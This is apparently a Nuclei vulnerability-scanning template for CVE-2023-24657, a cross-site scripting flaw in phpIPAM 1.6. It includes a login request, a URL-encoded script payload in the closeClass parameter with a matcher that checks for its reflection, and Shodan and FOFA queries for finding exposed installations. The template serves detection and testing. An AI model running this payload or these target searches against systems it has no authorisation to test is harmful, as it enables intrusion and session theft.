nuclei-templates/http/cves/2023/CVE-2023-24657.yaml

53 lines
2.2 KiB
YAML

id: CVE-2023-24657
info:
name: phpIPAM - 1.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of phpIPAM or apply the necessary security patches provided by the vendor.
reference:
- https://github.com/phpipam/phpipam/issues/3738
- https://nvd.nist.gov/vuln/detail/CVE-2023-24657
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-24657
cwe-id: CWE-79
epss-score: 0.01878
epss-percentile: 0.88418
cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: phpipam
product: phpipam
shodan-query:
- html:"phpIPAM IP address management"
- http.html:"phpipam ip address management"
fofa-query: body="phpipam ip address management"
tags: cve2023,cve,xss,phpipam,authenticated
http:
- raw:
- |
POST /app/login/login_check.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ipamusername={{username}}&ipampassword={{password}}
- |
GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "Subnet masks")'
condition: and
# digest: 4a0a00473045022100b43040d5ddff0d907d757322ca19e86d165f3d6ac79b7cc01317cefe96c180a90220747af3c14f10ca46f6e1696b2dac795c114cb9da5911337646a25b4e6a114e17:922c64590222798bb761d5b6d8e72950